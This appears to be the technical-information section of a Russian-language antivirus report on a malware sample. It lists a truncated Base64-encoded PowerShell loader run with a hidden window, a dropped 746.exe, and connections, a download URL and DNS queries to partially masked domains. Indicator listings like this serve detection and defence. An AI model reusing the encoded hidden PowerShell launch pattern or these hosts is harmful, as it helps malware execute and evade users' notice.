Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIAAgAHMAeQBTAFQARQBNAC4ASQBPAC4AQwBPAG0AcAByAEUAUwBTAGkATwBOAC4AZABlAGYATABhAFQARQBzAFQAUgBFAEEAbQAoAFsAUwBZAHMAVABFAG0ALgBpAE8ALgBtAGUATQBvAHIAeQBzAHQAUgBFAE...
- %HOMEPATH%\746.exe
- %HOMEPATH%\746.exe
- 'sm###edia.com':443
- 'sh###omi.com':80
- http://sh###omi.com/ihrbuild.com/niL/
- DNS ASK sm###edia.com
- DNS ASK tr#####a-aerospace.com
- DNS ASK pa#####ontinental.com
- DNS ASK sh###omi.com
- DNS ASK ge###ekiser.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIAAgAHMAeQBTAFQARQBNAC4ASQBPAC4AQwBPAG0AcAByAEUAUwBTAGkATwBOAC4AZABlAGYATABhAFQARQBzAFQAUgBFAEEAbQAoAFsAUwBZAHMAVABFAG0ALgBpAE8ALgBtAGUATQBvAHIAeQBzAHQAUgBFAE...' (со скрытым окном)